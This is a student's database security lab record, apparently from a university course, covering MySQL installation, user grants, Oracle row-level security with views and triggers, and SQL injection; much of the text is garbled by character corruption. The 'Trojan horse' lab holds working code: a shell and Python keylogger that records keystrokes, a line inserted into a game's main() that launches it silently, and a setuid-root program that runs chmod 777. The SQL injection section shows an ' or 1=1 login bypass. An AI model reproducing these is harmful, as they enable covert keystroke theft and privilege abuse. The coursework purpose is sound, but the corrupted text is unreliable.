137568 Dbs Lab Final

8/11/2019 137568 Dbs Lab Final

1/38

LAB WORK

DATABASE SECURITY

Name : Sunil Kumar SumanClass : M.Tech II Semes!er"R#ll n#. : $%&'()*acul!+ : Sri S.Ra,i Chan-ra

8/11/2019 137568 Dbs Lab Final

2/38

INDE

I. C#n/i0urin0 an- Ins!allin0 M+S1L Ser,er /r#m s#urce c#-e. Crea!i#n an-mani2ula!i#n #/ -a!a3ase usin0 S1L scri2!s :

a) Crea!i#n #/ -a!a3ase schema 4i!h a 0i,en -a!a3ase -esi0n

b) Crea!i#n #/ 2rimar+ an- /#rei0n 5e+s /#r rela!i#nsc) Ins!an!ia!e !he -a!a3ase 4i!h ins!ancesd)Mani2ula!i#n #/ e6is!in0 ins!ance 4i!h ,ari#us #2!i#nsRes!ric!7 casca-e7 se!

NULL" in re/eren!ial in!e0ri!+.

II. M#-i/ica!i#n #/ Access C#n!r#l Lis! !# chan0e !he -i//eren! user 2ri,ile0esusin0 8ran! Ta3le. Im2lemen!in0 DAC: Im2lemen!a!i#n #/ -a!a3ase securi!+2#licies usin0 DAC in MYS1L

a) User crea!i#n7 r#les7 2r#/iles an- 2ri,ile0esb) In!er2re! 0i,en -a!a3ase securi!+ 2#licies in!# an access c#n!r#l ma!ri6

c)Assi0n 2ri,ile0es 3ase- #n users d) Un-ers!an- 2#!en!ial ,ulnera3ili!ies #/ DAC

III. A--in0 Na!i,e *unc!i#n !# M+S1L Ser,er 3+ e-i!in0 s#urce c#-e

I9. Im2lemen!a!i#n #/ Tr#an ;#rse 2r#0ram !# chan0e !he user 2ri,ile0es !# a

2ar!icular /ile

9. Im2lemen!a!i#n #/ 9ir!ual her #4ne- rec#r-s 3+ Selec!

9I. Im2lemen!a!i#n #/ 9

8/11/2019 137568 Dbs Lab Final

3/38

I. Configuring and Installing MySQL Server from source code

A.

8/11/2019 137568 Dbs Lab Final

4/38

B. !re"installation configuration

a) A--in0 user an- 0r#u2

shell grou*add sunilshell useradd "r "g sunil sunil

C. Installation

a) Crea!in0 3uil- -irec!#r+

F0# !# -irec!#r+ l#ca!i#n 4here s#urce is e6!rac!e- i.e m+s@l?ser,er

shell cd -/ME0mys#l"server0mys#l"%.&.'%0

Fcrea!e 3uil- -irec!#r+ an- en!er in!# 3uil- -irec!#r+

shell m+dir bldshell cd bld

b) C#n/i0ura!i#n 4i!h cma5e

Fissue /#ll#4in0 c#mman- a/!er en!erin0 !# 3uil- -irec!#r+ 3l-

shellcma+e ..

c) Buil-in0 s#urce c#-e

Fissue /#ll#4in0 c#mman- !# 3uil- !he s#urce

shell sudo ma+e

d) Ins!allin0 M+S1L ser,er

1/#ll#4in0 c#mman- 4ill ins!all M+S1L ser,er

shell sudo ma+e install

1This 4ill ins!all M+S1L ser,er in i!s -e/aul! ins!alla!i#n -irec!#r+ i.e 0usr0local0mys#l

8/11/2019 137568 Dbs Lab Final

5/38

8/11/2019 137568 Dbs Lab Final

6/38

8/11/2019 137568 Dbs Lab Final

7/38

D. !ost"installation configuration

a) Ins!allin0 0ran! !a3le

shell sudo .0mys#l5install5db ""user6sunil ""basedir60usr0local0mys#l""datadir60s#ldata

b)Chan0in0 2ermissi#n #/ -a!a -irec!#r+

shell cd 0shell c7o8n "2 sunil s#ldata

F-a!a -irec!#r+ mus! 3e #4ne- 3+ usersunil" #!her4ise 0ran! !a3le 4ill n#!l#a- success/ull+.

c) O!her c#n/i0ura!i#ns

F all #!her c#n/i0ura!i#ns rela!e- !# s!ar!in0 #/ M+S1L ser,er is 5e2! in a

/ile name- my.conf un-er >usr>l#cal>m+s@l. ;ere 4e can chan0e !he-e/aul! 2#r! n#. %%=(" !# s#me #!her in case -e/aul! 2#r! is alrea-+ in use.

8/11/2019 137568 Dbs Lab Final

8/38

8/11/2019 137568 Dbs Lab Final

9/38

m+s@l I3SE24 I34/

8/11/2019 137568 Dbs Lab Final

10/38

8/11/2019 137568 Dbs Lab Final

11/38

m+s@l C2EA4E 4ABLE I 3/4 E;IS4S

8/11/2019 137568 Dbs Lab Final

12/38

m+s@l C2EA4E 4ABLE I 3/4 E;IS4S

8/11/2019 137568 Dbs Lab Final

13/38

SC2EE3S/4S

8/11/2019 137568 Dbs Lab Final

14/38

8/11/2019 137568 Dbs Lab Final

15/38

m+s@l flus7 *rivileges>m+s@l #uit>

F N#4 c#nnec!in0 !hr#u0h user$7 userG an- user% an- chec5in0 2ermissi#ns #n-a!a3ase 2harmac+ :

shell .0bin0mys#l "u user' "*En!er 2ass4#r-:

m+s@l s7o8 grants>F #u!2u!

??????????????????????????????????????????????????????????????????????????????????????????????????????????????H 8ran!s /#r user$l#calh#s! H??????????????????????????????????????????????????????????????????????????????????????????????????????????????H 8RANT USA8E ON J.J TO user$l#calh#s! IDENTI*IED BY shell.0bin0mys#l "u userK "*En!er 2ass4#r-:

m+s@l s7o8 grants>

F#u!2u!

??????????????????????????????????????????????????????????????????????????????????????????????????????????????H 8ran!s /#r user%l#calh#s! H??????????????????????????????????????????????????????????????????????????????????????????????????????????????H 8RANT USA8E ON J.J TO user%l#calh#s! IDENTI*IED BY

8/11/2019 137568 Dbs Lab Final

16/38

SC2EE3S/4S

8/11/2019 137568 Dbs Lab Final

17/38

LAB III

Adding 3ative unction to MySQL Server by editing source code

F ;ere I am a--in0 a na!i,e /unc!i#n name- $nit8?) 4hich !a5es s!rin0 as ar0umen!an- re!urns !ha! s!rin0 #n s!an-ar! #u!2u!.

S!e2s:*#r a--in0 na!i,e /unc!i#n 4hich re!urns s!rin0 ,alue7 m#-i/ica!i#n !# !he /#ll#4in0/iles is re@uire-. These /iles are insi-e !he >s@l /#l-er #/ s#urce c#-e -irec!#r+.

a) item5create.ccb) item5strfunc.7

c) item5strfunc.cc

a) M#-i/ica!i#n in i!emcrea!e.cc

F class -e/ini!i#n /#r ni!4"

lass Create_fun _nitw : publi Create_fun _arg1

{

publi :

virtual Item * reate(THD *thd Item *arg1!"

stati Create_fun _nitw s_singlet#n"

pr#te ted:

Create_fun _nitw(! { $

virtual %Create_fun _nitw(! { $

$ "

F A--in0 me!h#-

Create_fun _nitw Create_fun _nitw::s_singlet#n"

Item*

Create_fun _nitw:: reate(THD *thd Item *arg1!

{

return new (thd&'mem_r##t! Item_fun _nitw(arg1!"

$

F A--in0 s+m3#l in /uncarrarP

{ { C_T)I+_,ITH_-.(/IT,/! $ 0I-D.)(Create_fun _nitw!$

8/11/2019 137568 Dbs Lab Final

18/38

b) M#-i/ica!i#n in i!ems!r/unc.h

F Deri,in0 s!rin0 /unc!i#n /r#m i!ems!r/unc class -e/ine- in i!ems!r/unc.h

lass Item_fun _nitw :publi Item_str_fun

{

tring tmp_value"

publi :

Item_fun _nitw(Item *a! : I tem_str_fun (a! { $

tring *val_str(tring *!"

v#id f i2_length_and_de ( !

{

ma2_length345"

$

#nst har *fun _name( ! #nst { return /nitw/" $

$ "

c) M#-i/ica!i#n in i!ems!r/unc.cc

F ;ere ac!ual l#0ic #/ /unc!i#n is a--e-7 i.e 4ha! /unc!i#n 4ill 2er/#rm a/!ere6ecu!in0 an- 4ha! i! 4ill re!urn

tring *Item_fun _nitw: :val_str(tring *str!

{

return args657 &'val_str(str! "

$

F A/!er a--in0 !he a3#,e c#-es !# !heir res2ec!i,e /iles7 !he s#urce c#-e nee-s !# 3erec#m2ile7 3uil- an- ins!all.

F A/!er success/ul 3uil- an- ins!alla!i#n !he /unc!i#n nit8?) 4ill remain ac!i,e an-

can 3e use- an+!ime a/!er ser,er is s!ar!e-.

F Ou!2u! :

m+s@l SELECT ni!4QWelc#me Q"????????????????????H ni!4QWelc#me Q" H????????????????????H Welc#me H????????????????????$ r#4 in se! =.== sec"

8/11/2019 137568 Dbs Lab Final

19/38

SC2EE3S/4S

8/11/2019 137568 Dbs Lab Final

20/38

I. Im*lementation of 4roHan orse *rogram to c7ange t7e user *rivileges to a*articular file

a)shell scri2! !# rec#r- !he 5e+s!r#5es

#!/bin/bashif [[ $1 == "stop" ]]; then

python /home/sksuman/dbs/logger/parse.py #it should log aything it can even before the backup if

its timed out kill $(ps aux | awk '/[b]ackup/ {print $2}') #the most

elegant way to kill this process! exit #exit the script itself

fi

if [[ $1 == "start" ]]; then echo "Game initializing..."

fiwhile truedo

showkey > /home/sksuman/dbs/logger/logger.txtpython /home/sksuman/dbs/logger/parse.py

done

b) 2+!h#n scri2! !# ma2 !he 5e+s!r#5es 4i!h !he 5e+ma2.!6! /ile an- 0enera!e #u!2u! !# #u!2u!.l#0/ile

import datetime

fin = open("/home/sksuman/dbs/logger/keymap.txt", "r")lineList = fin.readlines()fin.close()args = ['nul']*88

for line in lineList:#print line

if line[0] == "k": #print int(line[8:10]) args.insert(int(line[8:10]),line[12:len(line)-1]) args.pop()#print args#print len(args)#now that i have formed the args list..I can work on the argsarray!fin = open("/home/sksuman/dbs/logger/logger.txt", "r")lineList = fin.readlines()fin.close()f = open("/home/sksuman/dbs/logger/output.log", "a")

index = 0

8/11/2019 137568 Dbs Lab Final

21/38

for line in lineList:#print line

if line[0:5] == "keyco":if index == 0: f.write("\n

\n"+datetime.datetime.now().strftime("%I:%M%p on %B %d, %Y")+" \n

============================================== \n")#Datetime to be saved only when some keycode is

read

########################### actual keystrokes getrecorded here ######################

index = int(line[9:11])if (index==42 or index==54) and line[12:len(line)-

1]=="press":#shift has been pressed

f.write("")elif index==58 and line[12:len(line)-1]=="press":

#caps has been pressedf.write("")

elif index==28 and line[12:len(line)-1]=="release":f.write("\n")

elif index==57 and line[12:len(line)-1]=="release":f.write("\t")

elif (index==42 or index==54) and line[12:len(line)-1]=="release":

#shift has been released

f.write("")elif index==58 and line[12:len(line)-1]=="release":

#caps has been releasedf.write("")

elif line[12:len(line)-1]=="release":f.write(args[index])

f.close()#file writing is done

c) Inser!in0 c#-e in !he main /unc!i#n #/ 0ame s#urce c#-e

#include

#include "supertux/main.hpp"

int main(int argc, char** argv){

system(./backup.sh start);

return Main().run(argc, argv);}

8/11/2019 137568 Dbs Lab Final

22/38

1 c7anging *ermission of a file using system call

a) a 2r#0ram in c 4hich uses s+s!em call !# chan0e !he 2ermissi#n

#include #include #include

main(){int uid;uid=setuid(0);if(uid==0){

system("chmod 777 /home/sksuman/dbs/logger/logger.txt");}}

b) chan0in0 !he 2ermissi#n #/ !he /ile ini!iall+ an- se!!in0 s!ic5+ 3i!

shell gcc 7orse.c "o 7orseshell sudo c7mod root 7orseshell sudo c7gr* root 7orse

shell sudo c7mod G 7orse

N#4 !his /ile can 3e !rans/erre- !# an+ s+s!em 4hich 4ill chan0e !he2ermissi#n #/ !he /ile 5e2! in >h#me>s5suman>l#00er>l#00er.!6!

8/11/2019 137568 Dbs Lab Final

23/38

8/11/2019 137568 Dbs Lab Final

24/38

8/11/2019 137568 Dbs Lab Final

25/38

eO*ort /2ACLE5/ME60u@'0a**0oracle0*roduct0''..@0OeeO*ort /2ACLE5SID6;EeO*ort 3LS5LA36N-/2ACLE5/ME0bin0nls5lang.s7NeO*ort /2ACLE5BASE60u@'0a**0oracleeO*ort LD5LIB2A25!A46-/2ACLE5/ME0libF-LD5LIB2A25!A4eO*ort !A46-/2ACLE5/ME0binF-!A4

3" e6ecu!e +#ur .2r#/ile !# l#a- !he chan0es:

shell . .$.pro!ile

)" S!ar! !he Oracle $$0RG E :

shell sudo service oracle-xe start

/=4!=4 F

sksuman@NITW:~$ sudo -i

[sudo] password for sksuman:

root@NITW:~# sqlplus sys as sysdba

!"lus: %&l&as& ''()(*()(* rodu+tion on ,on ,ar ' *:*.:)/

)*'/

0opyri12t 3+4 '.5)6 )*''6 7ra+l&( 8ll ri12ts r&s&r9&d(

nt&r password:

0onn&+t&d to:

7ra+l& ;atabas& ''1 +r&at& us&r sunilks id&ntifi&d by '?=5 d&fault tabl&spa+&

us&rsA

Bs&r +r&at&d(

!"> 1rant dba to sunilA

Crant su++&&d&d(

!"> 1rant +r&at& s&ssion to sunilksA

Crant su++&&d&d(

8/11/2019 137568 Dbs Lab Final

26/38

!"> +onn sunilksD'?=5A

0onn&+t&d(

ii) Create table and vie8

!"> +r&at& tabl& dbslab3rollno numb&r6us&rnam& 9ar+2ar3)*44A

Tabl& +r&at&d(

!"> ins&rt into dbslab 9alu&s3'?=56us&r4A

' row +r&at&d(

!"> s2o us&rA

B% is EBNI"FE

!"> s&l&+t from dbslabA

%7""N7 B%N8,

---------- --------------------

'?=5 BNI"F

!"> +r&at& 9i&w lo1inG9i&w as s&l&+t rollno6us&rnam& from dbslab

w2&r& us&rnam&Hus&rA

i&w +r&at&d(

!"> s&l&+t from lo1inG9i&wA

%7""N7 B%N8,

---------- -------------------- '?=5 BNI"F

!"> ins&rt into dbslab 9alu&s3'6us&r4A

' row +r&at&d(


%7""N7 B%N8,

---------- --------------------

'?=5 BNI"F ' BNI"F

iii) Create anot7er user $guest' and grant *ermissions F

!"> +onn sys as sysdbaA

nt&r password:

0onn&+t&d(

!"> +r&at& us&r 1u&st' id&ntifi&d by passwd' d&fault tabl&spa+&

us&rsA

Bs&r +r&at&d(

8/11/2019 137568 Dbs Lab Final

27/38

!"> 1rant +r&at& s&ssion to 1u&st'A

Crant su++&&d&d(

iii) Connect to sunil+s and grant *ermission to create session and on created

vie8 to user guest' > Insert values using vie8 by user guest' F


0onn&+t&d(

!"> 1rant s&l&+t6ins&rt on lo1inG9i&w to 1u&st'A

Crant su++&&d&d(

!"> +onn 1u&st'Dpasswd'A

0onn&+t&d(

!"> s&l&+t from sunilks(lo1inG9i&wA

no rows s&l&+t&d

!"> ins&rt into sunilks(lo1inG9i&w 9alu&s3)6us&r4A

' row +r&at&d(


%7""N7 B%N8,

---------- --------------------

) CBT'

!"> ins&rt into sunilks(lo1inG9i&w 9alu&s36us&r4A

' row +r&at&d(

iii) erify 87et7er select command dis*laying ro8s of currently logged in user ornot F


0onn&+t&d(

!"> s2ow us&rA

B% is ECBT'E


%7""N7 B%N8,

---------- --------------------

) CBT'

CBT'

Since current user is guest' and its s7o8ing only ro8s from 7avingusername6guest'. So it is verified.

8/11/2019 137568 Dbs Lab Final

28/38


0onn&+t&d(

!"> s2ow us&rA

B% is EBNI"FE


%7""N7 B%N8,

---------- --------------------

'?=5 BNI"F

' BNI"F


%7""N7 B%N8,

---------- --------------------

'?=5 BNI"F

' BNI"F ) CBT'

CBT'

rom t7e above out*ut 8e can see t7at 87en 8e login t7roug7 user $sunil+sand try to access ro8s using vie8 $login5vie8 : it is s7o8ing t7e results onlybelongs to user sunil+s not t7at of $guest'.

V7ile in second case if 8e are selecting ro8s directly fromtable i.e not using vie8: t7en all t7e results of t7e table $dbslab is retrieved

irres*ective of t7e logged in user.

ence vie8 can be im*lemented to *rovide ro8 level security?!D) 87en used8it7 t7e /2ACLE *redefined function $user.

8/11/2019 137568 Dbs Lab Final

29/38

I. Im*lementation of !D using /racle a**lication ConteOt

This is similar !# !he 2re,i#us assi0nmen!7 !he #nl+ -i//erence is here 4e nee- !#crea!e a TRI88ER 4hich au!#ma!icall+ inser! !he username #/ curren!l+ l#00e- inuser 4hene,er 4e inser! an+ ,alue in !he -e/ine- !a3le :

i) Inserting a value in table dbslab 8it7out using funtion $user andverifying 87et7er username is added automtically or not F


0onn&+t&d(

!"> s2ow us&rA

B% is ECBT'E

!"> ins&rt into sunilks(lo1inG9i&w3rollno4 9alu&s 3/4A

' row +r&at&d(


%7""N7 B%N8,

---------- --------------------

) CBT'

CBT'


0onn&+t&d(


%7""N7 B%N8,

---------- --------------------

'?=5 BNI"F

' BNI"F


%7""N7 B%N8,

---------- --------------------

'?=5 BNI"F

' BNI"F

) CBT'

CBT'

/

Clearl+ 4e can see !ha! r#lln# /iel- ha,in0 ,alue is inser!e- 3u! i! has n# username inser!e-au!#ma!icall+.

ii) 3o8: creating a 42IE2 87ic7 8ill insert username automatically u*oneac7 insert statement F

!"> s2ow us&rA

B% is EBNI"FE

8/11/2019 137568 Dbs Lab Final

30/38

!"> +r&at& or r&pla+& tri11&r tr1

) b&for& ins&rt

on dbslab

/ for &a+2 row

b&1in

= :n&w(us&rnam& :H us&rA

? &ndA

5 D

Tri11&r +r&at&d(

!"> s&l&+t tri11&rGnam& from us&rGtri11&rsA

T%ICC%GN8,

------------------------------

T%C

iii) erifying 8or+ing of trigger 42 F


0onn&+t&d(


%7""N7 B%N8,

---------- --------------------

) CBT'

CBT'

!"> ins&rt into sunilks(lo1inG9i&w3rollno4 9alu&s34A

' row +r&at&d(


%7""N7 B%N8,

---------- --------------------

) CBT'

CBT'

CBT'

1 Clearly 8e can see from above out*ut username guest' is added automatically


0onn&+t&d(


%7""N7 B%N8,

---------- --------------------

'?=5 BNI"F

' BNI"F

) CBT'

CBT' /

CBT'

8/11/2019 137568 Dbs Lab Final

31/38

= rows s&l&+t&d(

!"> ins&rt into lo1inG9i&w3rollno4 9alu&s3=4A

' row +r&at&d(

!"> s&l&+t from lo1inG9i&wA

%7""N7 B%N8,

---------- --------------------

'?=5 BNI"F

' BNI"F

= BNI"F


%7""N7 B%N8,

---------- -------------------- '?=5 BNI"F

' BNI"F

) CBT'

CBT'

/

CBT'

= BNI"F

? rows s&l&+t&d(

1 47e above out*ut s7o8s username $suni+s is added automaticallyence verified.

8/11/2019 137568 Dbs Lab Final

32/38

II. SQL I3PEC4I/3 IM!LEME34A4/3

;ere I ha,e crea!e- !4# /#rms an- !4# 2h2 /ile 4hich ,ali-a!es !he -a!a usernamean- 2ass4#r-" /r#m M+S1L -a!a3ase.

The /irs! 2h2 c#-e is ,ulnera3le !# S1L INVECTION.The sec#n- 2h2 c#-e is secure-.

The ,ulnera3ili!+ is -ue !# sin0le @u#!e < " .

4ML Code for creating form 87ic7 ta+es username and *ass8ord as userin*ut F

55555555555555555555555555555555555555555555555555555555555555555555

dbs-lab login page, NITWThis is a test page to sho% implementation o& simple "'()IN*#TI+N TT#"
")N12) T+ '() IN*#TI+N"

ser Name 4ass%ord

GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG

!! code 87ic7 validates username and *ass8ord given by t7e user in t7eform?code above) 8it7 t7e mys#l database s#l5inH5test: table admin F

8/11/2019 137568 Dbs Lab Final

33/38

47is !! code is vulnerable to SQL I3PEC4I/3 FGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG

0H

echo "a;thoriation s;ccess999"D@>

GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG

SEC=2E !! code 87ic7 validates username and *ass8ord given by t7e userin t7e form?code above) 8it7 t7e mys#l database table admin F

55555555555555555555555555555555555555555555555555555555555555555555

8/11/2019 137568 Dbs Lab Final

34/38

Ares;lt = mys5l65;eryE"select ;sername,pass%ord &rom admin %here;sername = A;name"DAro%=mys5l6&etch6arrayEAres;ltD

i&EAro%B";sername"C==A;name LL Aro%B"pass%ord"C==Apas%dH

echo ";thoriation s;ccess999"D@>

666666666666666666666666666666666666666666666666666666666666666666

OUTPUT

8/11/2019 137568 Dbs Lab Final

35/38

)ogin page here I am ;sing ;sername s;nil and pass%ord:$.M?

8/11/2019 137568 Dbs Lab Final

36/38

o;tp;t

No% login ;sing ;sername s;nilO pass%ord or:=:

8/11/2019 137568 Dbs Lab Final

37/38

+;tp;t ;thoriation s;ccess&;l, %hich sho%s the phpcode is 8;lnerable to s5l in7ection attacP9

No% login to &orm %hich is sec;re &rom s5l in7ectionattacP

;sername s;nilpass%ord or:=:

sec;red s5l in7ection login page

The abo8e 3TQ) &orm sends o;tp;t to the php &iles5l6in7ection6sec;re6login9php %hich 8alidates the inp;to& the &orm &rom mys5l database Es5l6in76test tableadmin %hich consists o& ;sername s;nil and pass%ord as:$.M?9

%hen login %ith inp;t pass%ord liPe E or:=: itsho;ld &ail the a;thoriation and ret;rn error9

8/11/2019 137568 Dbs Lab Final

38/38

+T4T

#learly &rom the second res;lt %e can see that the second434 code is sec;re to s5l in7ection attacP since it

doesnot allo%ed the pass%ord as E or:=:9

Date post:	02-Jun-2018
Category:	Documents
Upload:	rambabudamalla
View:	218 times
Download:	0 times

137568 Dbs Lab Final

Documents